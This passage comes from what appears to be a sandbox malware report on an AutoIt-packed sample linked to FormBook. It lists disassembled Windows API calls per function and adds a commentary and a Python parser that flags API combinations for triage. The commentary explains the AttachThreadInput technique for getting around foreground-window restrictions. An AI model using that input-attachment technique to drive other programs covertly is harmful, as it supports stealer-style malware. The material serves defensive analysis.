                      • Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98
                      APIs
                      • _memset.LIBCMT ref: 00462542
                      • GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
                      • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
                      • Sleep.KERNEL32(000001F4), ref: 004625EB
                      • GetMenuItemCount.USER32(?), ref: 0046262F
                      • GetMenuItemID.USER32(?,00000000), ref: 0046264B
                      • GetMenuItemID.USER32(?,-00000001), ref: 00462675
                      • GetMenuItemID.USER32(?,?), ref: 004626BA
                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                      • String ID:
                      • API String ID: 4176008265-0
                      • Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                      • Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
                      • Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                      • Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A
                      APIs
                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
                      • GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
                      • _memset.LIBCMT ref: 00486FDD
                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$LongWindow_memset
                      • String ID:
                      • API String ID: 830647256-0
                      • Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                      • Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
                      • Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                      • Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64
                      APIs
                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
                      • SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
                      • VariantInit.OLEAUT32(?), ref: 00456C2A
                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
                      • VariantCopy.OLEAUT32(?,?), ref: 00456C9D
                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
                      • VariantClear.OLEAUT32(?), ref: 00456CC6
                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
                      • VariantClear.OLEAUT32(?), ref: 00456CEE
                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                      • String ID:
                      • API String ID: 2706829360-0
                      • Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                      • Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
                      • Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                      • Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94
                      APIs
                        • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                        • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                      • CoInitialize.OLE32 ref: 00478403
                      • CoUninitialize.OLE32 ref: 0047840E
                      • CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
                      • IIDFromString.OLE32(?,?), ref: 004784E1
                      • VariantInit.OLEAUT32(?), ref: 0047857B
                      • VariantClear.OLEAUT32(?), ref: 004785DC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                      • API String ID: 834269672-1287834457
                      • Opcode ID: c6f8ca96ce36d867b95c5300b034a7c5a4be955f287127c01fb95931614cda58
                      • Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
                      • Opcode Fuzzy Hash: c6f8ca96ce36d867b95c5300b034a7c5a4be955f287127c01fb95931614cda58
                      • Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
                      • GetLastError.KERNEL32 ref: 0046B550
                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Error$Mode$DiskFreeLastSpace
                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                      • API String ID: 4194297153-14809454
                      • Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                      • Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
                      • Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                      • Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A
                      APIs
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                        • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
                      • GetDlgCtrlID.USER32 ref: 0045901F
                      • GetParent.USER32 ref: 0045903B
                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
                      • GetDlgCtrlID.USER32(?), ref: 00459047
                      • GetParent.USER32(?), ref: 00459063
                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 1536045017-1403004172
                      • Opcode ID: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                      • Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
                      • Opcode Fuzzy Hash: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                      • Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28
                      APIs
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                        • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
                      • GetDlgCtrlID.USER32 ref: 00459108
                      • GetParent.USER32 ref: 00459124
                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
                      • GetDlgCtrlID.USER32(?), ref: 00459130
                      • GetParent.USER32(?), ref: 0045914C
                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 1536045017-1403004172
                      • Opcode ID: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                      • Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
                      • Opcode Fuzzy Hash: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                      • Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29
                      APIs
                      • GetParent.USER32 ref: 0045916F
                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
                      • _wcscmp.LIBCMT ref: 00459196
                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ClassMessageNameParentSend_wcscmp
                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                      • API String ID: 1704125052-3381328864
                      • Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                      • Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
                      • Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                      • Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 004611F0
                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
                      • GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                      • String ID:
                      • API String ID: 2156557900-0
                      • Opcode ID: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                      • Instruction ID: 1e48a1bdefc3aaf7905b324a82868e76ea33fb60fcd143e126220ea2d996acdd
                      • Opcode Fuzzy Hash: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                      • Instruction Fuzzy Hash: 2B31D275600208BFDB109F54EC98F6A37A9EF54315F1582BEFA00E62B0E7789D448B5E
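A caveat when reading these per-function listings: the report classifies the sample as a compiled AutoIt script, and the strings attached to the functions above (the drive types "cdrom$fixed$network$ramdisk$removable", the DriveStatus words "INVALID$NOTREADY$READONLY$READY$UNKNOWN", the interpreter error "Incorrect Object type in FOR..IN loop") match the vocabulary of the AutoIt runtime rather than of FormBook. The function at 0x4611F0 directly above is the runtime's window-activation helper: GetForegroundWindow, GetWindowThreadProcessId and AttachThreadInput(…, TRUE) share the foreground thread's input queue, which is the documented way around the SetForegroundWindow restrictions, followed by the matching AttachThreadInput(…, FALSE) detaches. The FormBook behaviour listed under Signatures should therefore be looked for in the memory dumps of the process the sample writes into, not in this interpreter code. The parser below is an added example (not Joe Sandbox code): it reads listings in the format shown on this page, groups the calls per function, flags API combinations worth attention, and separates attach from detach calls. The sample text is copied from the two function blocks at 0x4611F0 and 0x46B4D0 on this page, reduced to their "APIs" and "Similarity" lines; the signature table is the example's own assumption, not a Joe Sandbox rule set.

```python
"""Parse Joe Sandbox per-function API listings and flag API combinations.
Added example; not Joe Sandbox code."""
import re
from dataclasses import dataclass, field

# Constructed sample: two function blocks copied from this report (the
# AttachThreadInput function near 0x4611F0 and the drive-status function near
# 0x46B4D0), reduced to their "APIs" and "Similarity" lines.
SAMPLE = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 004611F0
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
• GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
• GetLastError.KERNEL32 ref: 0046B550
• SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
"""

# One "• Name.MODULE(args), ref: ADDR" line; subcall lines carry a prefix.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-F]{8}:\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)


@dataclass
class FunctionBlock:
    """One disassembled function: calls in listing order, API ID, strings."""
    calls: list = field(default_factory=list)  # (name, module, args, address)
    api_id: str = ""
    strings: list = field(default_factory=list)

    def names(self):
        return {name for name, _, _, _ in self.calls}


def parse_report(text):
    """Split the listing into FunctionBlocks; every "APIs" line opens a new one."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            cur.calls.append((m["name"], m["module"], args, int(m["ref"], 16)))
        elif line.startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("• String ID:"):
            value = line.split(":", 1)[1].strip()
            cur.strings = value.split("$") if value else []
    return blocks


# Assumed signature table: (label, APIs that must all occur in one function, why).
SIGNATURES = [
    ("foreground input-queue attach",
     {"GetForegroundWindow", "GetWindowThreadProcessId", "AttachThreadInput"},
     "shares the foreground thread's input queue, the documented way around "
     "SetForegroundWindow restrictions and a prerequisite for driving its input"),
    ("drive probe with critical-error box suppressed",
     {"SetErrorMode", "GetDiskFreeSpaceW", "GetLastError"},
     "SetErrorMode(SEM_FAILCRITICALERRORS=1) hides the 'insert a disk' dialog "
     "while drives are probed"),
]


def match_signatures(block):
    present = block.names()
    return [label for label, required, _ in SIGNATURES if required <= present]


def attach_detach_counts(block):
    """Bucket AttachThreadInput calls by fAttach (3rd arg): 00000001 attaches,
    00000000 detaches, anything else ('?') was not recovered by the sandbox."""
    counts = {"attach": 0, "detach": 0, "unknown": 0}
    for name, _, args, _ in block.calls:
        if name == "AttachThreadInput":
            flag = args[2] if len(args) > 2 else "?"
            counts[{"00000001": "attach", "00000000": "detach"}.get(flag, "unknown")] += 1
    return counts


if __name__ == "__main__":
    for b in parse_report(SAMPLE):
        print(f"{b.api_id}: {match_signatures(b)} {attach_detach_counts(b)}")
```

Feed the whole "Execution Graph" text of a report into `parse_report` and the signature list becomes a cheap triage filter; the `'?'` bucket matters because an argument the sandbox could not recover should not be counted as either an attach or a detach.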
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Variant$ClearInit$_memset
                      • String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                      • API String ID: 2862541840-2080382077
                      APIs
                      • EnumChildWindows.USER32(?,0045A439), ref: 0045A377
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ChildEnumWindows
                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                      • API String ID: 3555792229-1603158881
                      APIs
                      • SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
                        • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
                        • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
                        • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
                      • GetDC.USER32 ref: 0043CD32
                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
                      • SelectObject.GDI32(00000000,00000000), ref: 0043CD53
                      • SelectObject.GDI32(00000000,00000000), ref: 0043CD68
                      • ReleaseDC.USER32(?,00000000), ref: 0043CD70
                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                      • String ID: U
                      • API String ID: 4009187628-3372436214
                      APIs
                      • RtlDecodePointer.NTDLL(00000000), ref: 02F91A3E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: DecodePointer
                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                      • API String ID: 3527080286-3064271455
                      APIs
                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
                      • SysFreeString.OLEAUT32(?), ref: 00478F00
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                      • String ID:
                      • API String ID: 560350794-0
                      APIs
                        • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                        • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                        • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                      • lstrcmpiW.KERNEL32(?,?), ref: 00464D40
                      • _wcscmp.LIBCMT ref: 00464D5A
                      • MoveFileW.KERNEL32(?,?), ref: 00464D75
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                      • String ID:
                      • API String ID: 793581249-0
                      APIs
